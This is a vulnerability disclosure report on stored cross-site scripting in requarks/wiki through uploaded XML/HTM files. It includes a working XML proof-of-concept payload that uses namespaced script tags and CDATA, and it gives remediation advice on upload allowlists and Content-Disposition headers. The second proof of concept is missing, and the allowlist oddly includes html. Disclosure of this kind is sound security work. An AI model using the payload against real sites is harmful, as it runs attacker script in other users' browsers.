Cross-site Scripting (XSS) - Stored in requarks/wiki
Dec 20th 2021
Stored XSS can be performed by malicious XML / HTM files. There is no check in place to prevent such files from being uploaded.
Proof of Concept 1 (XML)
1: Upload the following file as payload.xml:
<html> <head></head> <body> <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script> <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script> <info> <name> <value><![CDATA[<script>confirm(document.domain)</script>]]></value> </name> <description> <value>Hello</value> </description> <url> <value>http://google.com</value> </url> </info> </body> </html>
Proof of Concept 2 (HTM)
2: Upload the following file as payload.htm:
This vulnerability is capable of XSS via malicious XML / HTM files
Only allow image file uploads (png / html / webp / svg [sanitize this one properly!])
If filetype restriction unallowed, I strongly suggest you opt for Content-Disposition method. As there are many dangerous file types which can be uploaded. I recommend:
For select files ( .png, .jpg, .svg (after sanitization) .pdf, .gif ... etc):
Use the Content-Disposition: inline header so that they can be viewed in the browser.
If the file extension does not match a safe file type
Use the Content-Disposition: attachments header so that they are directly downloaded to user computers instead.